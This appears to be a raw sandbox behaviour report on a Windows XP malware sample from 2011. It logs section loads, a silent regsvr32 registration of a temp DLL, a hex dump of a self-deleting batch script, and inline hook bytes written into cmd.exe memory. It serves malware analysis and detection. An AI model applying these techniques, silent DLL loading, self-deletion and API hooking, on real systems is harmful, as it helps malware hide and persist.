Section loaded Path: C:\Program Files\Common Files\System\wab32res.dll Access: query and write and read and execute Type: image Baseaddress: 35F40000 Size: 258048 Protection: read write Mapped to pid: own pid success or wait 2661821763
+ Sections
+ General
Start time: 05:44:49
Start date: 08/12/2011
Path: C:\WINDOWS\system32\regsvr32.exe
Commandline: regsvr32 -s C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\wpbt1.dll
Imagebase: 0x1000000
File size: 11776 bytes
MD5 hash: FBDB9D0935B9907B809B381FDDF1627F
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 1B0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 1D0000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 220000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 270000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 270000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 774E0000 1302528 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 280000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 3C0000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 6F880000 1875968 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 3D0000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 350000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 1010000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 8B0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 380000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 380000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 380000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 8B0000 618496 own pid readonly success or wait 1
C:\WINDOWS\system32\rpcss.dll write and read and execute commit 8B0000 401408 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll write and read and execute commit 8B0000 299008 own pid execute success or wait 1
C:\WINDOWS\system32\msctf.dll query and write and read and execute image 74720000 311296 own pid read write success or wait 1
\BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read commit 74720000 311296 own pid read write object name exists 1
\BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 query and write and read and execute and extend size unknown 8C0000 262144 own pid read write success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
User Activities:
+ Window enumerated
Desktop HWND Parent HWND Enum Children TID Window Handles Completion Count Source Address
0 0 false 738 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2 1001E31
+ Chronological sections
Operation Data Completion Time
Section loaded Path: \KnownDlls\kernel32.dll Access: write and read and execute Type: unknown Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2661259722
Section loaded Path: unknown Access: query and write and read and execute and extend size Type: reserve Baseaddress: 7C800000 Size: 1007616 Protection: read write Mapped to pid: own pid success or wait 2661267641
Section loaded Path: \NLS\NlsSectionUnicode Access: read Type: unknown Baseaddress: 1B0000 Size: 90112 Protection: readonly Mapped to pid: own pid success or wait 2661277737
Section loaded Path: \NLS\NlsSectionLocale Access: read Type: unknown Baseaddress: 1D0000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2661279116
Section loaded Path: \NLS\NlsSectionSortkey Access: query and read Type: unknown Baseaddress: 220000 Size: 266240 Protection: readonly Mapped to pid: own pid success or wait 2661279846
Section loaded Path: \NLS\NlsSectionSortTbls Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid success or wait 2661287272
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2661288784
Section loaded Path: \NLS\NlsSectionSortkey00000409 Access: read Type: unknown Baseaddress: 270000 Size: 24576 Protection: readonly Mapped to pid: own pid object name not found 2661289159
Section loaded Path: \KnownDlls\msvcrt.dll Access: write and read and execute Type: unknown Baseaddress: 77C10000 Size: 360448 Protection: read write Mapped to pid: own pid success or wait 2661294689
Section loaded Path: \KnownDlls\ADVAPI32.dll Access: write and read and execute Type: unknown Baseaddress: 77DD0000 Size: 634880 Protection: read write Mapped to pid: own pid success or wait 2661303106
Section loaded Path: \KnownDlls\RPCRT4.dll Access: write and read and execute Type: unknown Baseaddress: 77E70000 Size: 602112 Protection: read write Mapped to pid: own pid success or wait 2661311261
Section loaded Path: \KnownDlls\Secur32.dll Access: write and read and execute Type: unknown Baseaddress: 77FE0000 Size: 69632 Protection: read write Mapped to pid: own pid success or wait 2661319300
Section loaded Path: \KnownDlls\USER32.dll Access: write and read and execute Type: unknown Baseaddress: 7E410000 Size: 593920 Protection: read write Mapped to pid: own pid success or wait 2661337096
Section loaded Path: \KnownDlls\GDI32.dll Access: write and read and execute Type: unknown Baseaddress: 77F10000 Size: 299008 Protection: read write Mapped to pid: own pid success or wait 2661338521
Section loaded Path: \KnownDlls\ole32.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid success or wait 2661345802
Section loaded Path: \KnownDlls\ShimEng.dll Access: write and read and execute Type: unknown Baseaddress: 774E0000 Size: 1302528 Protection: read write Mapped to pid: own pid object name not found 2661353661
Section loaded Path: C:\WINDOWS\system32\shimeng.dll Access: query and write and read and execute Type: image Baseaddress: 5CB70000 Size: 155648 Protection: read write Mapped to pid: own pid success or wait 2661355489
Section loaded Path: C:\WINDOWS\AppPatch\sysmain.sdb Access: read Type: commit Baseaddress: 280000 Size: 1208320 Protection: readonly Mapped to pid: own pid success or wait 2661361298
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2661372811
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: write and read and execute Type: commit Baseaddress: 3C0000 Size: 1855488 Protection: execute Mapped to pid: own pid success or wait 2661375660
Section loaded Path: C:\WINDOWS\AppPatch\acgenral.dll Access: query and write and read and execute Type: image Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid success or wait 2661378027
Section loaded Path: \KnownDlls\WINMM.dll Access: write and read and execute Type: unknown Baseaddress: 6F880000 Size: 1875968 Protection: read write Mapped to pid: own pid object name not found 2661393989
Section loaded Path: C:\WINDOWS\system32\winmm.dll Access: query and write and read and execute Type: image Baseaddress: 76B40000 Size: 184320 Protection: read write Mapped to pid: own pid success or wait 2661395689
Section loaded Path: \KnownDlls\OLEAUT32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid success or wait 2661409284
Section loaded Path: \KnownDlls\MSACM32.dll Access: write and read and execute Type: unknown Baseaddress: 77120000 Size: 569344 Protection: read write Mapped to pid: own pid object name not found 2661415727
Section loaded Path: C:\WINDOWS\system32\msacm32.dll Access: query and write and read and execute Type: image Baseaddress: 77BE0000 Size: 86016 Protection: read write Mapped to pid: own pid success or wait 2661417494
Section loaded Path: \KnownDlls\VERSION.dll Access: write and read and execute Type: unknown Baseaddress: 77C00000 Size: 32768 Protection: read write Mapped to pid: own pid success or wait 2661423120
Section loaded Path: \KnownDlls\SHELL32.dll Access: write and read and execute Type: unknown Baseaddress: 7C9C0000 Size: 8482816 Protection: read write Mapped to pid: own pid success or wait 2661426222
Section loaded Path: \KnownDlls\SHLWAPI.dll Access: write and read and execute Type: unknown Baseaddress: 77F60000 Size: 483328 Protection: read write Mapped to pid: own pid success or wait 2661433006
Section loaded Path: \KnownDlls\USERENV.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid success or wait 2661442812
Section loaded Path: \KnownDlls\UxTheme.dll Access: write and read and execute Type: unknown Baseaddress: 769C0000 Size: 737280 Protection: read write Mapped to pid: own pid object name not found 2661449094
Section loaded Path: C:\WINDOWS\system32\uxtheme.dll Access: query and write and read and execute Type: image Baseaddress: 5AD70000 Size: 229376 Protection: read write Mapped to pid: own pid success or wait 2661450655
Section loaded Path: \NLS\NlsSectionCType Access: read Type: unknown Baseaddress: 3D0000 Size: 12288 Protection: readonly Mapped to pid: own pid success or wait 2661459517
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2661521607
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: write and read and execute Type: commit Baseaddress: 350000 Size: 110592 Protection: execute Mapped to pid: own pid success or wait 2661543812
Section loaded Path: C:\WINDOWS\system32\imm32.dll Access: query and write and read and execute Type: image Baseaddress: 76390000 Size: 118784 Protection: read write Mapped to pid: own pid success or wait 2661546221
Section loaded Path: C:\WINDOWS\system32\shell32.dll Access: read Type: commit Baseaddress: 1010000 Size: 8462336 Protection: readonly Mapped to pid: own pid success or wait 2661690649
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 1056768 Protection: execute Mapped to pid: own pid success or wait 2661734771
Section loaded Path: C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll Access: query and write and read and execute Type: image Baseaddress: 773D0000 Size: 1060864 Protection: read write Mapped to pid: own pid success or wait 2661738019
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: write and read and execute Type: commit Baseaddress: 380000 Size: 4096 Protection: execute Mapped to pid: own pid success or wait 2661748955
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: query and read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2661751918
Section loaded Path: C:\WINDOWS\WindowsShell.Manifest Access: read Type: commit Baseaddress: 380000 Size: 4096 Protection: readonly Mapped to pid: own pid success or wait 2661754237
Section loaded Path: \KnownDlls\comctl32.dll Access: write and read and execute Type: unknown Baseaddress: 5D090000 Size: 630784 Protection: read write Mapped to pid: own pid success or wait 2661788077
Section loaded Path: C:\WINDOWS\system32\comctl32.dll Access: read Type: commit Baseaddress: 8B0000 Size: 618496 Protection: readonly Mapped to pid: own pid success or wait 2661804583
Section loaded Path: C:\WINDOWS\system32\rpcss.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 401408 Protection: execute Mapped to pid: own pid success or wait 2661836005
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: write and read and execute Type: commit Baseaddress: 8B0000 Size: 299008 Protection: execute Mapped to pid: own pid success or wait 2661954634
Section loaded Path: C:\WINDOWS\system32\msctf.dll Access: query and write and read and execute Type: image Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid success or wait 2661957210
Section loaded Path: \BaseNamedObjects\CiceroSharedMemDefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read Type: commit Baseaddress: 74720000 Size: 311296 Protection: read write Mapped to pid: own pid object name exists 2661965145
Section loaded Path: \BaseNamedObjects\CTF.TimListCache.FMPDefaultS-1-5-21-507921405-1960408961-839522115-500SFM.DefaultS-1-5-21-507921405-1960408961-839522115-500 Access: query and write and read and execute and extend size Type: unknown Baseaddress: 8C0000 Size: 262144 Protection: read write Mapped to pid: own pid success or wait 2661975737
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 738 HWNDs: 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2661982569
Windows enumerated Desktop: 0 Parent: 0 Enum Children: false TID: 738 HWNDs: 1, 902b0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0 success or wait 2661983179
+ Sections
+ General
Start time: 05:45:24
Start date: 08/12/2011
Path: C:\WINDOWS\system32\cmd.exe
Commandline: C:\WINDOWS\system32\cmd.exe /c C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat
Imagebase: 0x4ad00000
File size: 389120 bytes
MD5 hash: 6D778E0F95447E6546553EEEA709D03C
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\Documents and Settings\Administrator\Application Data\Ehotpo\agyla.doi.dat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 16A4FF
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 1 4AD02F12
+ File deleted
File Path Completion Count Source Address
C:\Documents and Settings\Administrator\Desktop\0.7663042396006076.exe success or wait 1 4AD17D07
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat success or wait 1 4AD17D07
+ File read
File Path Offset Length Value Completion Count Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 40 65 63 68 6F 20 6F 66 66 0D 0A 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 3A 64 0D 0A 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 64 65 6C 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 0D 0A 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 69 66 20 65 78 69 73 74 20 22 43 3A 5C 44 6F 63 75 6D 65 6E 74 73 20 61 6E 64 20 53 65 74 74 69 6E 67 73 5C 41 64 6D 69 6E 69 73 74 72 61 74 6F 72 5C 44 65 73 6B 74 6F 70 5C 30 2E 37 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 64 65 6C 20 2F 46 20 22 43 3A success or wait 1 4AD069F8
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat none 8192 64 65 6C 20 2F 46 20 22 43 3A 5C 44 4F 43 55 4D 45 7E 31 5C 41 44 4D 49 4E 49 7E 31 5C 4C 4F 43 41 4C 53 7E 31 5C 54 65 6D 70 5C 74 6D 70 61 63 38 64 31 32 37 34 2E 62 61 74 22 0D 0A 36 36 33 30 34 32 33 39 36 30 30 36 30 37 36 2E 65 78 65 22 20 67 6F 74 6F 20 64 0D 0A 00 65 6C 20 2F 46 20 22 43 3A success or wait 1 4AD069F8
+ Other file operations
File Path Disposition Data Ascii Data Completion Count Source Address
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat PositionInformation Offset: 0 success or wait 24 4AD069B5
Section Activities:
+ Section loaded by Windows
File Path Access Type Base Size Mapped to pid Protection Completion Count
\KnownDlls\kernel32.dll write and read and execute unknown 7C800000 1007616 own pid read write success or wait 1
unknown query and write and read and execute and extend size reserve 7C800000 1007616 own pid read write success or wait 1
\NLS\NlsSectionUnicode read unknown 2F0000 90112 own pid readonly success or wait 1
\NLS\NlsSectionLocale read unknown 310000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortkey query and read unknown 360000 266240 own pid readonly success or wait 1
\NLS\NlsSectionSortTbls read unknown 3B0000 24576 own pid readonly success or wait 1
\NLS\NlsSectionSortkey00000409 read unknown 3B0000 24576 own pid readonly object name not found 1
\NLS\NlsSectionSortkey00000409 read unknown 3B0000 24576 own pid readonly object name not found 1
\KnownDlls\msvcrt.dll write and read and execute unknown 77C10000 360448 own pid read write success or wait 1
\KnownDlls\USER32.dll write and read and execute unknown 7E410000 593920 own pid read write success or wait 1
\KnownDlls\GDI32.dll write and read and execute unknown 77F10000 299008 own pid read write success or wait 1
\KnownDlls\ShimEng.dll write and read and execute unknown 77F10000 299008 own pid read write object name not found 1
C:\WINDOWS\system32\shimeng.dll query and write and read and execute image 5CB70000 155648 own pid read write success or wait 1
C:\WINDOWS\AppPatch\sysmain.sdb read commit 3C0000 1208320 own pid readonly success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 500000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll write and read and execute commit 500000 1855488 own pid execute success or wait 1
C:\WINDOWS\AppPatch\acgenral.dll query and write and read and execute image 6F880000 1875968 own pid read write success or wait 1
\KnownDlls\ADVAPI32.dll write and read and execute unknown 77DD0000 634880 own pid read write success or wait 1
\KnownDlls\RPCRT4.dll write and read and execute unknown 77E70000 602112 own pid read write success or wait 1
\KnownDlls\Secur32.dll write and read and execute unknown 77FE0000 69632 own pid read write success or wait 1
\KnownDlls\WINMM.dll write and read and execute unknown 77FE0000 69632 own pid read write object name not found 1
C:\WINDOWS\system32\winmm.dll query and write and read and execute image 76B40000 184320 own pid read write success or wait 1
\KnownDlls\ole32.dll write and read and execute unknown 774E0000 1302528 own pid read write success or wait 1
\KnownDlls\OLEAUT32.dll write and read and execute unknown 77120000 569344 own pid read write success or wait 1
\KnownDlls\MSACM32.dll write and read and execute unknown 77120000 569344 own pid read write object name not found 1
C:\WINDOWS\system32\msacm32.dll query and write and read and execute image 77BE0000 86016 own pid read write success or wait 1
\KnownDlls\VERSION.dll write and read and execute unknown 77C00000 32768 own pid read write success or wait 1
\KnownDlls\SHELL32.dll write and read and execute unknown 7C9C0000 8482816 own pid read write success or wait 1
\KnownDlls\SHLWAPI.dll write and read and execute unknown 77F60000 483328 own pid read write success or wait 1
\KnownDlls\USERENV.dll write and read and execute unknown 769C0000 737280 own pid read write success or wait 1
\KnownDlls\UxTheme.dll write and read and execute unknown 769C0000 737280 own pid read write object name not found 1
C:\WINDOWS\system32\uxtheme.dll query and write and read and execute image 5AD70000 229376 own pid read write success or wait 1
\NLS\NlsSectionCType read unknown 510000 12288 own pid readonly success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 490000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll write and read and execute commit 490000 110592 own pid execute success or wait 1
C:\WINDOWS\system32\imm32.dll query and write and read and execute image 76390000 118784 own pid read write success or wait 1
C:\WINDOWS\system32\shell32.dll read commit 9F0000 8462336 own pid readonly success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll write and read and execute commit 9F0000 1056768 own pid execute success or wait 1
C:\WINDOWS\WinSxS\x86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.6028_x-ww_61e65202\comctl32.dll query and write and read and execute image 773D0000 1060864 own pid read write success or wait 1
C:\WINDOWS\WindowsShell.Manifest write and read and execute commit 4C0000 4096 own pid execute success or wait 1
C:\WINDOWS\WindowsShell.Manifest query and read commit 4C0000 4096 own pid readonly success or wait 1
C:\WINDOWS\WindowsShell.Manifest read commit 4C0000 4096 own pid readonly success or wait 1
\KnownDlls\comctl32.dll write and read and execute unknown 5D090000 630784 own pid read write success or wait 1
C:\WINDOWS\system32\comctl32.dll read commit 9F0000 618496 own pid readonly success or wait 1
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\tmpac8d1274.bat query and read commit A80000 4096 own pid readonly success or wait 1
+ Section loaded by program
File Path Access Type Base Size Mapped to pid Protection Completion Count Source Address
\KnownDlls\WS2_32.dll write and read and execute unknown 9F0000 618496 own pid readonly object name not found 1 164018
C:\WINDOWS\system32\ws2_32.dll query and write and read and execute image 71AB0000 94208 own pid read write success or wait 1 164018
\KnownDlls\WS2HELP.dll write and read and execute unknown 71AB0000 94208 own pid read write object name not found 1 164018
C:\WINDOWS\system32\ws2help.dll query and write and read and execute image 71AA0000 32768 own pid read write success or wait 1 164018
\KnownDlls\CRYPT32.dll write and read and execute unknown 77A80000 610304 own pid read write success or wait 1 164018
\KnownDlls\MSASN1.dll write and read and execute unknown 77B20000 73728 own pid read write success or wait 1 164018
\KnownDlls\WININET.dll write and read and execute unknown 771B0000 696320 own pid read write success or wait 1 164018
C:\WINDOWS\system32\wininet.dll read commit 9F0000 667648 own pid readonly success or wait 1 164018
\KnownDlls\NETAPI32.dll write and read and execute unknown 5B860000 348160 own pid read write success or wait 1 164018
Registry Activities:
+ Key value queried
Key Path Name Completion Count Source Address
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor EnableExtensions success or wait 2 4AD04A4F
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DelayedExpansion object name not found 2 4AD04A88
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DefaultColor success or wait 2 4AD04AAD
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor PathCompletionChar success or wait 1 4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor AutoRun success or wait 1 4AD04BB8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor DisableUNCCheck object name not found 1 4AD04A2A
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor CompletionChar success or wait 1 4AD04AE5
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor PathCompletionChar object name not found 1 4AD04B37
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor AutoRun object name not found 1 4AD04BB8
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} Enabled object name not found 1 155EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} EnabledV8 success or wait 1 155EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} CleanCookies success or wait 1 155FBA
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} CleanCookies success or wait 1 155EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} 1406 success or wait 5 155EB7
HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Safer\CodeIdentifiers\0\Paths\{dda3f824-d8cb-441b-834d-be2efd2c1a33} 1609 success or wait 5 155EB7
Memory Activities:
+ Memory read
PID Filepath Base Length Value Completion Count Source Address
2152 C:\WINDOWS\system32\cmd.exe 7C90D1AE 30 B8 35 00 00 00 BA 00 03 FE 7F FF 12 C2 20 00 90 B8 36 00 00 00 BA 00 03 FE 7F FF 12 C2 10 success or wait 1 16F078
2152 C:\WINDOWS\system32\cmd.exe 7C91632D 30 68 6C 02 00 00 68 80 64 91 7C E8 8F 85 FF FF A1 C8 E0 97 7C 89 45 E4 8B 45 08 89 85 B4 FD success or wait 1 16F078
2152 C:\WINDOWS\system32\cmd.exe 77212EBC 30 8B FF 55 8B EC 83 EC 14 53 33 DB 56 33 F6 33 C0 39 5D 08 57 89 5D F8 89 5D EC 89 5D FC 75 success or wait 1 16F078
2152 C:\WINDOWS\system32\cmd.exe 771C60A1 30 8B FF 55 8B EC 6A 13 6A 00 FF 75 18 FF 75 14 FF 75 10 FF 75 0C FF 75 08 E8 36 C6 FF FF 5D success or wait 1 16F078
+ Memory written
PID Filepath Base Length Value Completion Count Source Address
2152 C:\WINDOWS\system32\cmd.exe A90000 10 B8 35 00 00 00 E9 A9 D1 E7 7B success or wait 1 16F0EC
2152 C:\WINDOWS\system32\cmd.exe 7C90D1AE 5 E9 A4 AE 85 83 success or wait 1 16F11A
2152 C:\WINDOWS\system32\cmd.exe A9000A 10 68 6C 02 00 00 E9 1E 63 E8 7B success or wait 1 16F0EC
2152 C:\WINDOWS\system32\cmd.exe 7C91632D 5 E9 09 1F 85 83 success or wait 1 16F11A
2152 C:\WINDOWS\system32\cmd.exe A90014 10 8B FF 55 8B EC E9 A3 2E 78 76 success or wait 1 16F0EC
2152 C:\WINDOWS\system32\cmd.exe 77212EBC 5 E9 FD 4B F4 88 success or wait 1 16F11A
2152 C:\WINDOWS\system32\cmd.exe A9001E 10 8B FF 55 8B EC E9 7E 60 73 76 success or wait 1 16F0EC
2152 C:\WINDOWS\system32\cmd.exe 771C60A1 5 E9 6F 1A F9 88 success or wait 1 16F11A
+ Memory allocated
PID Filepath Base Length Protection Completion Count Source Address
2152 C:\WINDOWS\system32\cmd.exe 9F0000 2DF8C8 page read and write success or wait 1 16A5EB
2152 C:\WINDOWS\system32\cmd.exe 9F0000 2DF8CC page read and write success or wait 1 16A5EB
2152 C:\WINDOWS\system32\cmd.exe A70000 13FE10 page read and write success or wait 1 4AD04578
2152 C:\WINDOWS\system32\cmd.exe A90000 2DF4C0 page execute and read and write success or wait 1 173FCB
+ Memory attributes changed
PID Filepath Base Length New Protection Old Protection Completion Count Source Address
